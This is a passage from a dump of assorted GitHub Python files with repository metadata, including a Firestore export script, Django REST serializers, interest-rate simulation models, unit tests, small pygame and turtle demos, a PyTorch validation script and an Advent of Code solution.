= sys.argv[2]\nproject_version = sys.argv[3]\nproject_description = sys.argv[4]\nproject_requires_python = sys.argv[5]\ntype = sys.argv[6]\n\nfile = Path(input_path)\n\ntry:\n pyproject = tomlkit.loads(file.read_text())\n with file.open(\"w\") as f:\n if type != \"poetry\":\n pyproject[\"project\"][\"name\"] = project_name\n pyproject[\"project\"][\"version\"] = project_version\n pyproject[\"project\"][\"description\"] = project_description\n pyproject[\"project\"][\"requires-python\"] = project_requires_python\n else:\n #pyproject[\"tool\"][\"poetry\"][\"name\"] = project_name\n pyproject[\"tool\"][\"poetry\"][\"version\"] = project_version\n pyproject[\"tool\"][\"poetry\"][\"description\"] = project_description\n pyproject[\"tool\"][\"poetry\"][\"dependencies\"][\n \"python\"\n ] = project_requires_python\n\n f.write(tomlkit.dumps(pyproject))\n sys.exit()\nexcept Exception as e:\n print(\"Error updating pyproject.toml: %s\" % e)\n","repo_name":"albilu/netbeansPython","sub_path":"src/main/resources/org/netbeans/modules/python/toml_handler.py","file_name":"toml_handler.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"71101595629","text":"import argparse\nfrom pathlib import Path\nimport firebase_admin\nfrom firebase_admin import credentials, firestore\nimport json\nfrom typing import NamedTuple\nimport subprocess\nimport time\n\n\nclass FirestoreEncoder(json.JSONEncoder):\n def default(self, obj):\n # Check if the object is an instance of Firestore's datetime type\n if hasattr(obj, \"isoformat\"):\n return obj.isoformat()\n return super(FirestoreEncoder, self).default(obj)\n\n\ndef load_creds(relpath: str):\n cred_archive = Path(\"~/Documents/api_credentials.sparsebundle\").expanduser()\n cred_file = Path(\"/Volumes/creds/\") / relpath\n assert cred_archive.exists(), f\"Sparsebundle does not exist at {cred_archive}\" # pathlib thinks that sparsebundles are directories, not files\n assert cred_file.suffix == \".json\", f\"File {cred_file} does not have .json suffix\"\n if not cred_file.parent.is_dir():\n clout = subprocess.run([\"open\", str(cred_archive)], encoding=\"utf-8\", check=True)\n assert clout.returncode == 0\n timeout = 10 # seconds\n delay = 0.5\n while not cred_file.parent.is_dir():\n time.sleep(delay)\n timeout -= delay\n assert timeout > 0, f\"Timed out waiting for {cred_file.parent} to be mounted\"\n assert cred_file.is_file(), f\"File {cred_file} does not exist\"\n with open(cred_file, \"r\", encoding=\"utf-8\") as f:\n contents = json.load(f)\n Cred = NamedTuple(\"Cred\", data=dict[str, str], path=str)\n return Cred(contents, str(cred_file))\n\n\ndef authorize(credpath: str, encrypted=False):\n\n if encrypted:\n credential = load_creds(credpath)\n cred_path = credential.path\n else:\n cred_path = Path(credpath).expanduser()\n if not cred_path.is_absolute():\n cred_path = (Path(__file__).parent / cred_path).resolve()\n\n assert Path(cred_path).is_file(), f\"File {cred_path} does not exist\"\n\n cred = credentials.Certificate(cred_path)\n\n firebase_admin.initialize_app(cred)\n\n return firestore.client()\n\n\ndef getdata(credpath: str, exportpath: str, collections: list[str], encrypted: bool = False):\n\n export_path = Path(exportpath).expanduser()\n if not export_path.is_absolute():\n export_path = (Path(__file__).parent / export_path).absolute()\n\n if export_path.exists():\n raise Exception(f\"Path {export_path} already exists. Aborting to prevent overwriting data.\")\n\n export_path.mkdir(parents=True, exist_ok=True)\n\n db = authorize(credpath, encrypted)\n\n for collection_name in collections:\n\n docs = db.collection(collection_name).stream()\n\n data = {doc.id: doc.to_dict() for doc in docs}\n\n data_path = export_path / f\"{collection_name}.json\"\n\n with open(data_path, \"w\", encoding=\"utf-8\") as json_file:\n json.dump(data, json_file, cls=FirestoreEncoder, indent=2)\n\n\ndef _cli():\n \"\"\"Retrieve data from Firestore and save it locally.\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"Data Retriever\",\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n # argument_default=argparse.SUPPRESS\n # epilog=\"Text at the bottom of help\"\n )\n parser.add_argument(\"--cred\", dest=\"credpath\", required=True, help=\"Path to Firebase credentials JSON file\")\n parser.add_argument(\"--out\", dest=\"exportpath\", required=True, help=\"Output directory path\")\n parser.add_argument(\"--collection\", dest=\"collections\", nargs=\"+\", required=True, help=\"Name of the Firestore collections to retrieve\")\n parser.add_argument(\"--encrypted\", action=\"store_true\", help=\"Specify if the credentials file is stored in an encrypted sparseimage\")\n args = parser.parse_args()\n return vars(args)\n\n\ndef main(credpath: str, exportpath: str, collections: list[str], encrypted: bool = False):\n\n getdata(credpath=credpath, exportpath=exportpath, collections=collections, encrypted=encrypted)\n\n\nif __name__ == \"__main__\":\n main(**_cli())\n","repo_name":"daeh/jspsych-template","sub_path":"scripts/retrieve_data.py","file_name":"retrieve_data.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10564273796","text":"from rest_framework.serializers import ModelSerializer \nfrom rest_framework import serializers\nfrom post.models import Post, Comment, PostMedia, PostLike\n\nclass PostLikeSerializers(ModelSerializer):\n class Meta:\n model = PostLike\n fields = ['id', 'post', 'author']\n\nclass PostCommentsListSerializer(serializers.ListSerializer):\n\n def to_representation(self, data):\n user = self.context['request'].user\n new_data = data\n if hasattr(data, 'first') and data.first() is not None:\n print(data)\n post_author_id = data.first().reply_to.author.id\n # if not athenticated need to only approved\n # if owner of post needs to see all posts including un approved\n # if not owner need to see both approved and unapproved which you own\n # if super user then show all\n if not user.is_authenticated:\n print('not authenticated')\n new_data = data.filter(approved=True)\n else:\n if post_author_id == user.id:\n new_data=data\n else:\n print(\"looking for owned comments\")\n user_data = data.filter(author = user)\n new_data = user_data|data.filter(approved=True)\n new_data =new_data.order_by(\"-created_date\")\n return super(PostCommentsListSerializer, self).to_representation(new_data)\n \nclass PostMediaSerializers(ModelSerializer):\n class Meta:\n model = PostMedia\n fields = ['id', 'image']\n\nclass PostCommentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author' , 'approved' , 'created_date']\n read_only_fields = ['author', 'approved' ,'created_date']\n list_serializer_class = PostCommentsListSerializer\n \nclass PostOwnerPostComentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author', 'approved','created_date']\n read_only_fields = ['author', 'created_date']\n list_serializer_class = PostCommentsListSerializer\n\nclass CommentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author' , 'approved' , 'created_date']\n read_only_fields = ['author', 'approved' ,'created_date']\n\nclass PostOwnerComentSerializers(ModelSerializer):\n class Meta:\n model = Comment\n fields = ['id','text', 'author', 'approved','created_date']\n read_only_fields = ['author', 'created_date']\n\nclass PostSerializers(ModelSerializer):\n likes_count = serializers.SerializerMethodField(read_only=True)\n comments = PostCommentSerializers(source='comment_set', many=True, read_only=True)\n post_media = PostMediaSerializers(source='postmedia_set', many=True, required=False)\n\n class Meta:\n model = Post\n fields = [\n 'id', 'text', 'likes_count', 'likes_count',\n 'post_media', 'author', 'approved', 'comments','created_date',\n ]\n read_only_fields = ['author', 'approved', 'comments','created_date',]\n \n def get_likes_count(self, obj):\n return obj.postlike_set.count()\n\n def create(self,validated_data):\n user = self.context['request'].user\n instance=Post.objects.create(author=user ,**validated_data)\n return instance\n\nclass PostOwnerPostSerializers(PostOwnerComentSerializers):\n likes_count = serializers.SerializerMethodField(read_only=True)\n post_media = PostMediaSerializers(source='postmedia_set', many=True, required=False)\n comments = PostOwnerPostComentSerializers(source='comment_set', many=True, read_only=True)\n class Meta:\n model = Post\n fields = [\n 'id', 'text', 'likes_count', 'likes_count',\n 'post_media', 'author', 'approved', 'comments','created_date',\n ]\n read_only_fields = ['author', 'approved', 'comments','created_date',]\n def get_likes_count(self, obj):\n return obj.postlike_set.count()\n\nclass AdminPostSerializers(PostOwnerComentSerializers):\n likes_count = serializers.SerializerMethodField(read_only=True)\n post_media = PostMediaSerializers(source='postmedia_set', many=True, required=False)\n comments = PostOwnerPostComentSerializers(source='comment_set', many=True, read_only=True)\n class Meta:\n model = Post\n fields = [\n 'id', 'text', 'likes_count', 'likes_count',\n 'post_media', 'author', 'approved', 'comments','created_date',\n ]\n read_only_fields = ['author', 'comments','created_date',]\n def get_likes_count(self, obj):\n return obj.postlike_set.count()\n","repo_name":"iamafasha/facebookpro","sub_path":"api/post_serializers.py","file_name":"post_serializers.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72434534827","text":"#!/usr/bin/env python\n\"\"\"\n Stochastic models for interest rate term structures\n \tRun script to simulate. Option to replace input with own input. See bottom of file\n v0.1 - Mans Skytt (m@skytt.eu)\n\"\"\"\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom h5pyStorage import loadFromHDF5, storeToHDF5\nfrom forwardCurves import runSurfPlot\n\"\"\"\n#\tHelper function for checking timesteps\n\"\"\"\ndef checkTimesteps(timesteps):\n\tif timesteps % 1 != 0:\n\t\treturn int(round(timesteps))\n\telse:\n\t\ttimestepsInt = int(timesteps)\n\t\treturn timestepsInt\n\n\"\"\"\n#\tBrownian motion\n\"\"\"\ndef genBrownian(T, dt):\n\t\"\"\"\n\tT : Time until end, year base\n\treturns:\n\tdW : array with brownian motion from 0 to T with step size dt\n\t\"\"\"\n\ttimesteps = checkTimesteps(T/dt)\n\tif timesteps:\n\t\tdW = np.random.normal(0,np.sqrt(dt),timesteps)\n\t\treturn dW\n\treturn None\n\ndef genXBrownians(T, dt, X):\n\t\"\"\"\n\tT : Time until end, year base\n\tX : Number of brownian motions\n\treturns:\n\tdW : array with X brownian motions from 0 to T with step size dt\n\t\"\"\"\n\ttimesteps = checkTimesteps(T/dt)\n\tdW = genBrownian(T, dt)\n\ti = 1\n\twhile i < X:\n\t\tdWtemp = genBrownian(T, dt)\n\t\tdW = np.append(dW, dWtemp)\n\t\ti += 1\n\tdW = np.reshape(dW, (-1,X))\n\treturn dW\n\n\"\"\"\n#\tTwo-factor HJM\n\"\"\"\ndef twoFactorHJM(initVec, endTime):\n\t\"\"\"\n\tendTime : Time until stop of simulation, in years\n\tinitVec : Initial forward interest rate term structure\n\treturns: Time series of forecasted term strucutres\n\t\"\"\"\n\tsigma1 = 0.005 # volatility constants, replace with estimate made w suitable approximation (ML or kalman)\n\tsigma2 = 0.01\n\tkappa = 0.1\n\tdt = 1/365 # time horizion time step \n\tsimdt = 7/365 # simulation timestep\n\tT = 10\n\thorizonTimesteps = initVec.shape[0] # Timesteps in horizon\n\tsimTimesteps = checkTimesteps(endTime/simdt) # Timesteps for simulation\n\t# Generate volatility and drift functions\n\tt = np.linspace(7/365, T, horizonTimesteps) # time horizon\n\tsigmaf1 = sigma1*np.ones(t.shape) # first volatility function, constant over entire horizon\n\tsigmaf2 = sigma2*np.exp(-kappa*t) # second volatility function, varying over horizion\n\tmu = sigma1**2*t + sigma2**2/kappa*np.exp(-kappa*t)*(1-np.exp(-kappa*t)) # drift function\n\t# Generate brownian motions until end of simulation\n\n\tdW1 = genBrownian(endTime, simdt) \n\tdW2 = genBrownian(endTime, simdt) \n\t# Simulate yield curve progression\n\tdphi = np.zeros((simTimesteps,initVec.shape[0]))# Pre allocate dphi array space\n\tdphi[0,:] = initVec # Add initial Vector as first\n\tfor i in range(1, simTimesteps):\n\t\tdphi[i,:] = mu*dt + sigmaf1*dW1[i] + sigmaf2*dW2[i]\n\treturn np.cumsum(dphi, axis=0) \n\n\"\"\"\n#\tPC-based HJM\n\"\"\"\ndef PCHJM(initVec, endTime, PCsMat):\n\t\"\"\"\n\tendTime : Time until stop of simulation, in years\n\tinitVec : Initial forward interest rate term structure\n\tPCsMat : Principal components equivalent of the volatility functions. Could also be volatility functions for every time horizon\n\treturns: Time series of forecasted term strucutres\n\t\"\"\"\n\tdt = 1/365 # time horizion time step \n\tsimdt = 7/365 # simulation timestep\n\tT = 10 # Time horizon max\n\tnumbFactors = PCsMat.shape[1]\n\thorizonTimesteps = initVec.shape[0] # Timesteps in horizon\n\tsimTimesteps = checkTimesteps(endTime/simdt) # Timesteps for simulation\n\n\tintegratedSigma = np.cumsum(PCsMat, axis=0) # row equal time horizon index, column equal different sigmas\n\tmu = np.sum(integratedSigma*PCsMat, axis=1) # \n\tdW = genXBrownians(endTime, simdt, numbFactors) \n\t# Simulate yield curve progression\n\tdphi = np.zeros((simTimesteps,initVec.shape[0]))# Pre allocate dphi array space\n\tdphi[0,:] = initVec # Add initial Vector as first\n\tfor i in range(1, simTimesteps):\n\t\tsigmaTemp = np.sum(np.multiply(PCsMat,dW[i,:]), axis = 1)*np.sqrt(252)\n\t\tdphi[i,:] = mu*dt + sigmaTemp\n\treturn np.cumsum(dphi, axis = 0)\n\ndef HoLee(initVec, endTime, vol):\n\t\"\"\"\n\tendTime : Time until stop of simulation, in years\n\tinitVec : Initial forward interest rate term structure\n\tvol : volatility, yearly basis\n\treturns: Time series of forecasted term strucutres\n\t\"\"\"\n\tdt = 1/365 # time horizion time step \n\tsimdt = 7/365 # simulation timestep\n\tT = 10\n\thorizonTimesteps = initVec.shape[0] # Timesteps in horizon\n\tsimTimesteps = checkTimesteps(endTime/simdt) # Timesteps for simulation\n\t# Generate volatility and drift functions\n\tt = np.linspace(7/365, T, horizonTimesteps) # time horizon\n\tvolf = vol*np.ones(t.shape) # volatility, constant over entire horizon\n\tmu = vol**2*t # drift function\n\t# Generate brownian motions until end of simulation\n\tdW = genBrownian(endTime, simdt) \n\t\n\t# Simulate yield curve progression\n\tdphi = np.zeros((simTimesteps,initVec.shape[0]))# Pre allocate dphi array space\n\tdphi[0,:] = initVec # Add initial Vector as first\n\tfor i in range(1, simTimesteps):\n\t\tdphi[i,:] = mu*dt + volf*dW[i]\n\treturn np.cumsum(dphi, axis=0) \n\n\n\n# Load from storage file\nstorageFile = 'EONIAmid.hdf5' # Name of file where data is currently stored\nMATLABForwardMat = loadFromHDF5(storageFile,'MATLABForwardMat')\nMATLABForwardVec = MATLABForwardMat[0,:]\ntimes = loadFromHDF5(storageFile,'times')\nMATLABForPCs = loadFromHDF5(storageFile, 'MATLABForPCs')\n\n# Run simulations, comment out the ones not used\nphi = PCHJM(MATLABForwardVec, 5, MATLABForPCs)\n# phi = twoFactorHJM(MATLABForwardVec, 8)\n#phi = HoLee(MATLABForwardVec, 5, 0.1)\n\nrunSurfPlot(phi[:,:times.shape[0]], times)\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mskytt/AoMMaster","sub_path":"HJMmodels.py","file_name":"HJMmodels.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20243800260","text":"import unittest\nfrom src.pet import Pet\nfrom src.ability.ability_generator import AbilityGenerator\nfrom src.ability.ability import Ability\nfrom src.ability.modify_stats import ModifyStatsAbilityRandomFriend\nfrom src.pet_data_utils.enums.trigger_event import TriggerEvent\nfrom src.pet_data_utils.enums.effect_kind import EffectKind\nfrom src.pet_data_utils.enums.effect_target_kind import EffectTargetKind\nfrom src.team.team import Team\n\n\nclass TestAbility(unittest.TestCase):\n\n def setUp(self):\n self.test_pet = Pet(name=\"Test Pet\", attack=1, health=1, tier=1, level=1,\n ability1=None, ability2=None, ability3=None, ability_generator=AbilityGenerator)\n self.friend_pet1 = Pet(name=\"Test Friend Pet 1\", attack=1, health=1, tier=1, level=1,\n ability1=None, ability2=None, ability3=None, ability_generator=AbilityGenerator)\n self.friend_pet2 = Pet(name=\"Test Friend Pet 2\", attack=1, health=1, tier=1, level=1,\n ability1=None, ability2=None, ability3=None, ability_generator=AbilityGenerator)\n self.test_team = Team()\n self.test_team.add_pet(self.test_pet)\n self.test_team.add_pet(self.friend_pet1)\n self.test_team.add_pet(self.friend_pet2)\n\n def test_modify_stats_ability_random_friend_attributes(self):\n ability = ModifyStatsAbilityRandomFriend(owner=self.test_pet, attack_mod=1, health_mod=1,\n target_type=EffectTargetKind.RandomFriend, target_n=2,\n trigger_event=TriggerEvent.StartOfBattle, until_end_of_battle=True)\n\n self.assertIsInstance(ability, Ability)\n self.assertIn(ability.target_type, EffectTargetKind)\n self.assertIn(ability.trigger_event, TriggerEvent)\n\n def test_modify_stats_ability_random_friend_apply(self):\n ability = ModifyStatsAbilityRandomFriend(owner=self.test_pet, attack_mod=1, health_mod=1,\n target_type=EffectTargetKind.RandomFriend, target_n=2,\n trigger_event=TriggerEvent.StartOfBattle, until_end_of_battle=True)\n\n ability.trigger(event=TriggerEvent.StartOfBattle, pet=self.test_pet, team=self.test_team)\n\n self.assertEqual(self.friend_pet1.attack, 2)\n self.assertEqual(self.friend_pet1.health, 2)\n self.assertEqual(self.friend_pet1.attack, self.friend_pet2.attack)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MrKnowles55/super-auto-pets-simulator","sub_path":"tests/ability/test_modify_stats.py","file_name":"test_modify_stats.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25583087108","text":"import time\nimport logging\n\nfrom RuckusAutoTest.models import Test\n\nfrom RuckusAutoTest.components.lib.zd import scaling_zd_lib as lib\nfrom RuckusAutoTest.components.lib.simap import image_installer as installer\n\nclass CB_Scaling_Upgrade_SIMAP(Test):\n \n required_components = [\"ZoneDirector\"]\n parameter_description = {}\n\n def config(self, conf):\n self.conf = dict(simap_cfg = dict(tftpserver = '192.168.0.20',\n version = '9.0.0.0.21',\n model = 'ss2942'))\n \n self.conf.update(conf)\n self.simap_models = self.carrierbag['existed_simap_models']\n self.package_simap_cfg = self.conf['simap_cfg']\n self.package_simap_cfg['simap_models'] = self._retrieve_models(self.simap_models)\n \n self.agent = self.carrierbag['existed_sim_agent']\n self.zd = self.testbed.components['ZoneDirector']\n self.zdcli = self.testbed.components['ZoneDirectorCLI']\n \n def test(self): \n logging.info('package_sim-cfg [%s]' % self.package_simap_cfg)\n installer.install(self.zdcli, **self.package_simap_cfg)\n logging.info('SIMAP firmware configure successfully') \n self._bootup_simaps(self.agent, self.simap_models)\n if not self._verify_simaps_from_vm(self.agent, len(self.simap_models)):\n raise Exception('Some of SIMAPs haven\\'t boot up correctly, please check.')\n \n logging.info('[Initial]begin verify RuckusAPs and SimAPs, make sure all of them are connected.') \n try: \n self.zd.do_login()\n except:\n pass\n \n lib.verify_aps_by_models(self.zd, self.simap_models)\n logging.info('All of RuckusAPs and SimAPs are connected.')\n return self.returnResult(\"PASS\", \"All of RuckusAPs and SimAPs[%s] are connected.\" % self.simap_models) \n\n \n def cleanup(self):\n pass\n\n\n def _bootup_simaps(self, agent, models):\n simcfg = { \n 'ap_start_mac' : '00:13:92:03:02:00',\n 'ap_cnt' : 1,\n 'ap_mode':'zf9999',\n } \n for index in range(len(models)):\n simcfg['ap_mode'] = models[index]\n macID = '00'\n macID = self._convert_hex(index + 1)\n simcfg['ap_start_mac'] = '00:13:92:03:02:%s' % macID\n simcfg['ap_cnt'] = 1\n simcfg['rogue'] = 0\n simcfg['tap_id'] = index + 1\n agent.touch_tcfg(simcfg)\n agent.startup_single_simap()\n \n \n def _verify_simaps_from_vm(self, agent, expect_cnt, timeout=90):\n startT = time.time()\n while True:\n if time.time() - startT < timeout :\n cnt = agent.get_sim_ap_nums()\n if cnt != expect_cnt:\n logging.info('[%d] SimAPs have started, waiting for another[%d]' % (cnt, expect_cnt - cnt))\n time.sleep(5)\n \n else: \n return True\n \n return False ","repo_name":"jichunwei/MyGitHub-1","sub_path":"saigon/rat/RuckusAutoTest/tests/zd/CB_Scaling_Upgrade_SIMAP.py","file_name":"CB_Scaling_Upgrade_SIMAP.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8711907609","text":"import pygame\nimport importlib.util\nimport sys\n\nfrom pygame import color\n\nclass Board:\n\n def __init__(self, rows: int, cols: int, width: int, height: int, done: bool) -> None:\n self.rows = rows\n self.cols = cols\n self.width = width\n self.height = height\n self.done = done\n \n def draw(self):\n gap = self.width // 9\n for i in range(self.rows+1):\n if i % 3 == 0:\n thickness = 4\n else: \n thickness = 1\n pygame.draw.line(self.win, (0, 0, 0), (0, i*gap), (self.width, i*gap), thickness)\n pygame.draw.line(self.win, (0, 0, 0), (i*gap, 0), (i*gap, self.height), thickness)\n\nclass Tile:\n rows = 9\n cols = 9\n\n def __init__(self, val: int, row: int, col: int, width: int, height: int) -> None:\n self.val = val\n self.temp = 0\n self.row = row\n self.col = col\n self.width = width\n self.height = height\n\n def draw(self, win):\n fnt = pygame.font.SysFont(\"comicsans\", 40)\n\n gap = self.width // 9\n x = self.col * gap\n y = self.row * gap\n\ndef redraw_window(win, board):\n win.fill((255, 255, 255))\n board.draw()\n\ndef main():\n run = True\n win = pygame.display.set_mode((540, 600))\n pygame.display.set_caption(\"Sudoku\")\n\n board = [[9, 0, 0, 0, 0, 0, 0, 3, 8],\n [0, 5, 0, 2, 4, 6, 7, 9, 1],\n [0, 0, 0, 3, 0, 0, 4, 0, 0],\n [7, 0, 3, 0, 5, 8, 1, 0, 2],\n [0, 0, 0, 0, 0, 0, 0, 6, 7],\n [0, 0, 0, 0, 9, 0, 3, 8, 0],\n [0, 3, 0, 0, 0, 5, 8, 2, 4],\n [5, 8, 2, 4, 0, 3, 6, 1, 9],\n [0, 6, 9, 0, 2, 1, 5, 0, 0]]\n \n board = Board(9, 9, 540, 540, win)\n\n\n while run:\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n # redraw_window(win, board)\n\n\n\nmain()\npygame.quit()\n\n\n","repo_name":"nbermingham/backtracking","sub_path":"sudoku_gui.py","file_name":"sudoku_gui.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2313629630","text":"# 임규연 (lky473736)\n# 키보드로 움직임 제어하기\n\n# 직교좌표계 상에서 움직이는 터틀을 표현\n# left 키 : 왼쪽으로 30도 각도 틀기\n# right 키 : 오른쪽으로 30도 각도 틀기\n# 항상 앞으로 가고 있음\n\nimport turtle\n\nt = turtle.Turtle()\nt.shapesize(3, 1) # shapesize : comma를 기준으로 가로, 세로 순으로 n배 커짐\nt.speed (3)\n\ns = turtle.getscreen\n\ndef left() :\n t.lt(30)\n t.fd(30)\n \ndef right() :\n t.rt(30)\n t.fd(30)\n\ns.onkeypress(left, \"Left\")\ns.onkeypress(right, \"Right\")\n \nturtle.mainloop()","repo_name":"lky473736/practice-learningpython","sub_path":"t3-2.py","file_name":"t3-2.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74178861866","text":"import os\nimport json\nimport torch\nimport torch.nn as nn\nfrom torchvision import transforms, datasets\nimport time\nfrom tqdm import tqdm\n#from model import resnet34\ndef main(args):\n device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n data_transform = {\n \"val\": transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])}\n\n image_path = args.scence_data_path\n image_path = '/home/data/gzb/Scence_datasets/images'\n assert os.path.exists(image_path), \"{} path does not exist.\".format(image_path)\n\n\n\n validate_dataset = datasets.ImageFolder(root=image_path,\n transform=data_transform[\"val\"])\n val_num = len(validate_dataset)\n\n Scense_list = validate_dataset.class_to_idx\n validate_loader = torch.utils.data.DataLoader(validate_dataset,\n batch_size=args.batch_size, shuffle=False,\n num_workers=4)\n # net = resnet34()\n #in_channel = net.fc.in_features\n # net.fc = nn.Linear(in_channel, 51)\n #net.to(device)\n # load model weights\n weights_path = \"/home/guozebin/Scence_project/model.pth\"\n assert os.path.exists(weights_path), \"file: '{}' dose not exist.\".format(weights_path)\n net=torch.load(weights_path, map_location=device)\n val_acc = 0\n start_time=time.time()\n with torch.no_grad():\n val_bar=tqdm(validate_loader)\n for val_data in val_bar:\n val_images, val_labels = val_data\n outputs1 = net(val_images.to(device))\n predict_y = torch.max(outputs1, dim=1)[1]\n val_acc += torch.eq(predict_y, val_labels.to(device)).sum().item()\n val_accurate = (val_acc / val_num)*100\n print(\"#Totoal Images {}\".format(val_num))\n with open('val_result.txt','a') as f:\n f.write(\"#Totoal Images {}\".format(val_num))\n f.write('\\n')\n print('#Class {}'.format(len(Scense_list)))\n with open('val_result.txt','a') as f:\n f.write('#Class {}'.format(len(Scense_list)))\n f.write('\\n')\n print('Recognition accuracy ={:.1f}%({}/{}) run_time {:.2f}'.format(val_accurate,val_acc,val_num,(time.time()-start_time)))\n with open('val_result.txt','a') as f:\n f.write('Recognition accuracy ={:.1f}%({}/{}) run_time {:.2f}s'.format(val_accurate,val_acc,val_num,(time.time()-start_time)))\n f.write('\\n')\n f.write('Finished validation')\n print('Finished validation')\n\n\n\n\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(\n description=__doc__)\n parser.add_argument('--scence_data_path', default='/home/data/gzb/Scence_train_val_data', help='val path')\n parser.add_argument('--batch_size', default=64, help='val batch size')\n args = parser.parse_args()\n main(args)\n","repo_name":"Bin-ze/Scence_classify","sub_path":"val.py","file_name":"val.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72524891947","text":"import re\nfrom datetime import datetime, date, time, timedelta\t#import some datetime modules so we can deal with the dates and times in the records.\nfrom copy import copy\t\t\t\t\t#I can't honestly remember what we need 'copy' for, maybe nothing.\n\n#Example data (three variants):\n# [1518-11-01 00:00] Guard #10 begins shift\n# [1518-11-01 00:05] falls asleep\n# [1518-11-01 00:25] wakes up\n\n\n#we need to load in all the records (which are all mixed up) and sort them into chronological order\n\nrecords = []\t#create a list called 'records'\n\nfile = open('4-1-input.txt', 'r')\t#open the file containing the inputs provided by AoC\n\n#--beginning of for loop--\n\nfor line in file.readlines():\t\t#read the file, one line at a time\n\n getRecord = re.match('\\[(\\d{4}-\\d{2}-\\d{2}\\s\\d{2}:\\d{2})\\]\\s(\\w)\\w+\\s#*(\\d*)' , line.rstrip())\t#regular expressions \\o/\n\n if getRecord == None:\t\t#if the regular expression does not find a match for in the line we read in\n print(\"'\" + line.rstrip() + \"'\" + ' is not a valid record.')\n else:\n dt = datetime.strptime(getRecord[1],\"%Y-%m-%d %H:%M\")\t#if we do find a match for the regular expression, turn the date and time part into a 'datetime' object\n\n if getRecord[3] is not '':\t\t#if the 3rd part of the regular expression (the guard ID number) exists\n state = 'g'\t\t\t#set the 'state' to 'g' (a guard begins a shift)\n guardID = getRecord[3]\t\t#grab the ID of the guard who began the shift\n else:\n state = getRecord[2]\t\t#if the guard ID did not exist on that line, set the 'state' to the 'f'(alls asleep) or 'w'(akes up) we picked up in the RE \n guardID = None\t\t\t#and set the guard ID to none (as there wasn't one in this line)\n \n record = [dt, state, guardID]\t#create a list (basically an array) containing the 'datetime' object, the state [g(uard #x begins shift), f(alls asleep), or w(akes up)]\n\t\t\t\t\t#and the guardID [which is either a number-as-string or 'None'].\n records.append(record)\t\t# and then append it to 'records', which is the list of records we created/initialised before we started the for loop\n\n#--end of loop--\n \t\t\t\t\t\n\nrecords.sort(key=lambda element:element[0])\t#sort the records list according to element 0, which is the datetime object\n\n\n\nguardSleeps = {}\t\t\t#create a dictionary called 'guardSleeps'; this will contain 'keys'(the guard IDs) and 'values'(the number of minutes\n\t\t\t\t\t#they slept for: we will increment this as we search the list of records.\n\nguardRecords = []\t\t\t#create a list(array) called 'guardRecords'\n\n\n#--beginning of for loop\n\nfor record in records:\t\t\t#for each record in our sorted-by-date-and-time 'records' list, look through them one-by-one;\n if record[1] is 'g': \t\t\t#if the second item in our record is a 'g' (denoting a guard coming on shift),\n g = record[2] \t\t\t#then get the guard ID from the record, and store it in a new variable g.\n continue\t\t\t\t#Next we need to look at the records following this one, so stop this iteration of the loop and move to the next record.\n\n elif record[1] is 'f':\t\t#if the letter is an 'f' instead, then this is denoting when the aforementioned guard fell asleep;\n f = record[0]\t\t\t#So store the time from this record (the time the guard fell asleep) in the new variable f.\n continue\t\t\t\t#Then jump out of the loop and go back to the top of it, looking at the next record. \n\n elif record[1] is 'w':\t\t#if the letter is a 'w', this denotes when the guard woke up;\n w = record[0]\t\t\t#So take the time from the beginning of this record and store it in a new variable w.\n\n sleepAmount = w - f\t\t\t#we can perform arithmetic on datetime objects, so get the length of the guard's sleep,\n\t\t\t\t\t#by subtracting the fellAsleep time from the wake time.\n\n if g not in guardSleeps:\t\t#if the guardID is not already in our dictionary of guard sleep amounts,\n guardSleeps[g] = sleepAmount\t#then create a new key&value pair, like: guardID (as key): sleepAmount (as value)\n else:\n guardSleeps[g] += sleepAmount\t#Otherwise (if we have already stored this guardID in our dictionary) add the sleepAmount to whatever value is already\n\t\t\t\t\t#stored against that guardID.\n\n guardRecord = [g,f,w]\t\t\t#create a new record containing the guard ID [0], fall asleep time [1], woke up time [2] we have just found,\n guardRecords.append(guardRecord)\t#and add them as a line in our 'guardRecords' list.\n\n#--end of the for loop--\n\n \nsorted_guardSleeps = sorted(guardSleeps.items(), key=lambda element: element[1], reverse = True)\t#reverse-sort our dictionary of guardSleeps by element[1], \n\t\t\t\t\t\t\t\t\t\t\t\t\t#which is the value, so that the highest value is at the top.\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\nsleepyGuard = sorted_guardSleeps[0][0]\t\t#create a variable 'sleepyGuard' and 